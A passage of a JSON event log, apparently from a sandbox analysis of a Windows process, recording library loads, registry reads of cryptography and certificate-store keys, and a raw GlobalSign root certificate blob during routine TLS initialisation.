"pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,219", "eid": 346, "data": { "file": "C:\\Windows\\System32\\schannel.dll", "pathtofile": null, "moduleaddress": "0x7ffedfaa0000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,219", "eid": 347, "data": { "file": null, "pathtofile": null, "moduleaddress": null } }, { "event": "write", "object": "registry", "timestamp": "2025-11-20 10:58:35,219", "eid": 348, "data": { "regkey": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\SecurityProviders\\Schannel" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,219", "eid": 349, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\SCHANNEL\\UserContextLockCount", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,219", "eid": 350, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\SCHANNEL\\UserContextListCount", "content": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,344", "eid": 351, "data": { "file": "sspicli.dll", "pathtofile": null, "moduleaddress": "0x7ffee0a40000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,344", "eid": 352, "data": { "file": null, "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,344", "eid": 353, "data": { "file": "mskeyprotect.dll", "pathtofile": null, "moduleaddress": "0x7ffecb060000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,344", "eid": 354, "data": { "file": null, "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,344", "eid": 355, "data": { "file": "C:\\Windows\\System32\\ncryptsslp.dll", "pathtofile": null, "moduleaddress": "0x7ffecb1a0000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,344", "eid": 356, "data": { "file": null, "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,344", "eid": 357, "data": { "file": "C:\\Windows\\System32\\bcryptprimitives.dll", "pathtofile": null, "moduleaddress": "0x7ffee1390000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,344", "eid": 358, "data": { "file": null, "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,359", "eid": 359, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7\\Name", "content": "@%SystemRoot%\\System32\\ci.dll,-100" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,359", "eid": 360, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration", "content": "2" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,359", "eid": 361, "data": { "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-100", "content": "Isolated User Mode (IUM)" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,359", "eid": 362, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7\\Name", "content": "@%SystemRoot%\\System32\\ci.dll,-100" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,359", "eid": 363, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration", "content": "2" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,359", "eid": 364, "data": { "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-100", "content": "Isolated User Mode (IUM)" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,359", "eid": 365, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7\\Name", "content": "@%SystemRoot%\\System32\\ci.dll,-101" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,359", "eid": 366, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration", "content": "2" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,359", "eid": 367, "data": { "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-101", "content": "Enclave" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,359", "eid": 368, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7\\Name", "content": "@%SystemRoot%\\System32\\ci.dll,-101" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,359", "eid": 369, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration", "content": "2" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,359", "eid": 370, "data": { "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-101", "content": "Enclave" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,359", "eid": 371, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7\\Name", "content": "@%SystemRoot%\\system32\\dnsapi.dll,-103" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,359", "eid": 372, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration", "content": "2" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,359", "eid": 373, "data": { "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\dnsapi.dll,-103", "content": "\\x414\\x43e\\x432\\x435\\x440\\x435\\x43d\\x43d\\x44b\\x439 DNS-\\x441\\x435\\x440\\x432\\x435\\x440" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,359", "eid": 374, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7\\Name", "content": "@%SystemRoot%\\system32\\dnsapi.dll,-103" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,359", "eid": 375, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration", "content": "2" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,359", "eid": 376, "data": { "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\dnsapi.dll,-103", "content": "\\x414\\x43e\\x432\\x435\\x440\\x435\\x43d\\x43d\\x44b\\x439 DNS-\\x441\\x435\\x440\\x432\\x435\\x440" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,359", "eid": 377, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7\\Name", "content": "@%SystemRoot%\\System32\\wuaueng.dll,-400" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,359", "eid": 378, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration", "content": "2" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,359", "eid": 379, "data": { "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\wuaueng.dll,-400", "content": "\\x426\\x435\\x43d\\x442\\x440 \\x43e\\x431\\x43d\\x43e\\x432\\x43b\\x435\\x43d\\x438\\x44f Windows" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,359", "eid": 380, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7\\Name", "content": "@%SystemRoot%\\System32\\wuaueng.dll,-400" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,359", "eid": 381, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration", "content": "2" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,375", "eid": 382, "data": { "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\wuaueng.dll,-400", "content": "\\x426\\x435\\x43d\\x442\\x440 \\x43e\\x431\\x43d\\x43e\\x432\\x43b\\x435\\x43d\\x438\\x44f Windows" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,375", "eid": 383, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7\\Name", "content": "@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,375", "eid": 384, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration", "content": "2" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,375", "eid": 385, "data": { "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124", "content": "\\x428\\x438\\x444\\x440\\x43e\\x432\\x430\\x43d\\x438\\x435 \\x434\\x43e\\x43a\\x443\\x43c\\x435\\x43d\\x442\\x43e\\x432" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,375", "eid": 386, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7\\Name", "content": "@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,375", "eid": 387, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration", "content": "2" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,375", "eid": 388, "data": { "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124", "content": "\\x428\\x438\\x444\\x440\\x43e\\x432\\x430\\x43d\\x438\\x435 \\x434\\x43e\\x43a\\x443\\x43c\\x435\\x43d\\x442\\x43e\\x432" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,375", "eid": 389, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7\\Name", "content": "@%SystemRoot%\\system32\\NgcRecovery.dll,-100" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,375", "eid": 390, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration", "content": "2" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,375", "eid": 391, "data": { "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\NgcRecovery.dll,-100", "content": "\\x428\\x438\\x444\\x440\\x43e\\x432\\x430\\x43d\\x438\\x435 \\x43a\\x43b\\x44e\\x447\\x430 \\x432\\x43e\\x441\\x441\\x442\\x430\\x43d\\x43e\\x432\\x43b\\x435\\x43d\\x438\\x44f Windows Hello" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,375", "eid": 392, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7\\Name", "content": "@%SystemRoot%\\system32\\NgcRecovery.dll,-100" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,375", "eid": 393, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration", "content": "2" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,375", "eid": 394, "data": { "regkey": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\NgcRecovery.dll,-100", "content": "\\x428\\x438\\x444\\x440\\x43e\\x432\\x430\\x43d\\x438\\x435 \\x43a\\x43b\\x44e\\x447\\x430 \\x432\\x43e\\x441\\x441\\x442\\x430\\x43d\\x43e\\x432\\x43b\\x435\\x43d\\x438\\x44f Windows Hello" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,375", "eid": 395, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\crypt32\\DiagLevel", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,375", "eid": 396, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\crypt32\\DiagMatchAnyMask", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,375", "eid": 397, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableSerialChain", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,375", "eid": 398, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\CryptnetPreFetchTriggerPeriodSeconds", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,375", "eid": 399, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxUrlRetrievalByteCount", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,375", "eid": 400, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\DisallowedCertSyncDeltaTime", "content": null } }, { "event": "write", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 401, "data": { "regkey": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\Root" } }, { "event": "write", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 402, "data": { "regkey": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\Root" } }, { "event": "write", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 403, "data": { "regkey": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot" } }, { "event": "write", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 404, "data": { "regkey": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\Root" } }, { "event": "write", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 405, "data": { "regkey": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\Root" } }, { "event": "write", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 406, "data": { "regkey": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\SmartCardRoot" } }, { "event": "write", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 407, "data": { "regkey": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\CA" } }, { "event": "write", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 408, "data": { "regkey": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\CA" } }, { "event": "write", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 409, "data": { "regkey": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\CA" } }, { "event": "write", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 410, "data": { "regkey": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\CA" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 411, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlags", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 412, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableAutoFlushProcessNameList", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 413, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlushFirstDeltaSeconds", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 414, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlushNextDeltaSeconds", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 415, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 416, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2", "content": null } }, { "event": "write", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 417, "data": { "regkey": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 418, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 419, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 420, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2", "content": null } }, { "event": "write", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 421, "data": { "regkey": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\CA" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 422, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 423, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 424, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\932BED339AA69212C89375B79304B475490B89A0", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 425, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\932BED339AA69212C89375B79304B475490B89A0", "content": null } }, { "event": "write", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 426, "data": { "regkey": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 427, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates\\932BED339AA69212C89375B79304B475490B89A0", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 428, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\932BED339AA69212C89375B79304B475490B89A0", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 429, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0", "content": null } }, { "event": "write", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 430, "data": { "regkey": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\CA" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 431, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 432, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 433, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 434, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 435, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 436, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob", "content": "\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xb1\\xbc\\x96\\x8b\\xd4\\xf4\\x9db*\\xa8\\x9a\\x81\\xf2\\x15\\x01R\\xa4\\x1d\\x82\\x9c~\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x04+\\xebw\\xd5\\x01z\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x7f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00n\\xe7\\xf3\\xb0`\\xd1\\x0e\\x90\\xa3\\x1b\\xa3G\\x1b\\x99\\x926\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00`{f\\x1aE\r\\x97\\xca\\x89P/}\\x04\\xcd4\\xa8\\xff\\xfc\\xfdKb\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xeb\\xd4\\x10@\\xe4\\xbb>\\xc7B\\xc9\\xe3\\x81\\xd3\\x1e\\xf2\\xa4\\x1aH\\xb6h\\\\x96\\xe7\\xce\\xf3\\xc1\\xdfl\\xd43\\x1c\\x99\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00G\\x00l\\x00o\\x00b\\x00a\\x00l\\x00S\\x00i\\x00g\\x00n\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00A\\x00 \\x00-\\x00 \\x00R\\x001\\x00\\x00\\x00S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t+\\x06\\x01\\x04\\x01\\xa02\\x01\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00h\\x00\\x00\\x000f\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x08\\x02\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x06\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x07\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08 \\x00\\x00\\x00\\x01\\x00\\x00\\x00y\\x03\\x00\\x000\\x82\\x03u0\\x82\\x02]\\xa0\\x03\\x02\\x01\\x02\\x02\\x0b\\x04\\x00\\x00\\x00\\x00\\x01\\x15KZ\\xc3\\x940\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000W1" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 437, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\PinRulesLogDir", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,391", "eid": 438, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\PinRules", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,406", "eid": 439, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\PinRulesLastSyncTime", "content": "\\xaf\\xa4!\\x93\\xa7Y\\xdc\\x01" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:35,406", "eid": 440, "data": { "regkey": 